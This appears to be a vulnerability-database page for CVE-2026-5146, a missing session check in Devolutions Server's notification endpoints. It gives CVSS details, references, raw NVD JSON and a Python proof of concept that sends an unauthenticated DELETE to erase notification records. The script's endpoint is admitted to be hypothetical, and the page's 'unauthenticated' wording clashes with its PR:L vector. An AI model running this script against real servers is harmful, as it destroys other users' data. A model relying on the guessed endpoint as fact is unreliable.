CVE-2026-5146

Description

Improper access control in the notification management endpoints in Devolutions Server allows an unauthenticated attacker to modify or delete arbitrary user notification records via missing session validation. This issue affects the following versions : * Devolutions Server 2026.1.6.0 through 2026.1.15.0 * Devolutions Server 2025.3.19.0 and earlier

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Devolutions Server 2026.1.6.0 - 2026.1.15.0

Devolutions Server <= 2025.3.19.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_vulnerability(target_host, notification_id):
    """
    PoC to check for improper access control in notification endpoints.
    Attempts to delete a notification without authentication.
    """
    # Construct the target URL (Hypothetical endpoint based on description)
    target_url = f"{target_host}/api/notifications/{notification_id}"
    
    headers = {
        "User-Agent": "CVE-2026-5146-Scanner/1.0",
        "Content-Type": "application/json"
    }

    try:
        # Send DELETE request without session cookies or auth headers
        response = requests.delete(target_url, headers=headers, verify=False, timeout=10)
        
        if response.status_code == 200 or response.status_code == 204:
            print(f"[+] Vulnerability confirmed! Notification {notification_id} deleted.")
            return True
        elif response.status_code == 401 or response.status_code == 403:
            print("[-] Access denied. Target may be patched.")
            return False
        else:
            print(f"[?] Unexpected response code: {response.status_code}")
            return False
            
    except Exception as e:
        print(f"[!] Error connecting to target: {e}")
        return False

# Example usage
# check_vulnerability("https://devolutions-server.example.com", 1001)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5146
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5146
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5146/
[4] VulDB https://vuldb.com/cve/CVE-2026-5146
[5] https://devolutions.net/security/advisories/DEVO-2026-0012

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5146", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:32.177", "lastModified": "2026-05-13T16:17:01.633", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper access control in the notification management endpoints in Devolutions Server allows an unauthenticated attacker to modify or delete arbitrary user notification records via missing session validation.\n\n\n\nThis issue affects the following versions :\n\n * \n\nDevolutions Server 2026.1.6.0 through 2026.1.15.0\n\n\n * \n\nDevolutions Server 2025.3.19.0 and earlier"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://devolutions.net/security/advisories/DEVO-2026-0012", "source": "[email protected]"}]}}